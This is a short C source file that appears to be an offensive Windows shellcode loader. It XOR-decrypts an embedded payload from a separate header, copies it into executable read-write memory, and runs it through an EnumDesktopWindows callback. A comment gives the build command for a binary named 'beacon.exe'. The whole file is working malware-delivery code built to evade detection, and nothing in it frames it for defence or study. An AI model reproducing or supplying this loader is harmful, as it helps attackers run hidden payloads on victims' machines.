/**
 * loader.c — XOR-decrypt and execute shellcode via
 * EnumDesktopWindows callback.
 *
 * Build (cross-compile on Kali):
 *   x86_64-w64-mingw32-gcc loader.c -o beacon.exe -luser32 -Os -s
 *
 * The shellcode.h header (generated by xor_encrypt.py) must be in
 * the same directory or specified with -I.
 */

#include <windows.h>
#include "shellcode.h"

BOOL CALLBACK cb(HWND hwnd, LPARAM lParam) {
    (void)hwnd;
    (void)lParam;
    return TRUE;
}

int main(void) {
    /* Decrypt in place */
    for (unsigned int i = 0; i < payload_len; i++) {
        payload[i] ^= key[i % key_len];
    }

    /* Allocate RWX memory and copy */
    void *exec = VirtualAlloc(
        NULL, payload_len,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );
    if (!exec) return 1;
    memcpy(exec, payload, payload_len);

    /* Execute via callback */
    EnumDesktopWindows(
        GetThreadDesktop(GetCurrentThreadId()),
        (WNDENUMPROC)exec, 0
    );

    return 0;
}
